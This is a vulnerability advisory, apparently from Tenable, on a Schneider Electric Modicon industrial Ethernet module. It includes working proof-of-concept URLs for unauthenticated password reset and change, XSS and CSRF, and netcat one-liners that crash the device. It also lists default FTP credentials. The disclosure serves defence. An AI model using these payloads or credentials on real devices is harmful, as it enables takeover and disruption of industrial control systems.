Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.
CVE-2018-7809: Unauthenticated Password Reset
An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:
http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password
This also has the side affect of resetting the web server username and password to the default USER/USER.
CVE-2018-7810: Reflected XSS
A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert Javascript into the name parameter that will be executed in the context of the person who followed the link. An example follows:
http://[ip]/goform/formTest?name=<script>alert()</script>
CVE-2018-7811: Unauthenticated Password Change
The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change user's passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:
http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
CVE-2018-7830: Unauthenticated Remote Denial of Service
A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This will render the web server useless for ~1 minute The following is a one line proof of concept:
echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80
CVE-2018-7831: Cross-site request forgery
The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:
http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User
Others
Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated one of our vulnerabilities (default accounts) was a duplicate and the other (modbus denial of service) was not a vulnerability. However, we've decided to document them here.
Default FTP Accounts
We found a handful of default FTP accounts. Some passwords we used required use of a VxHash collision disclosed by H.D. Moore in 2010.
| Username | Password |
| sysdiag | factorycast@schneider |
| fdrusers | sresurdf |
| fwupgrade | FaAmU5p2F~ |
| loki | ZfTljublsx |
Modbus Denial of Service
Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shutdown the Ethernet module:
echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502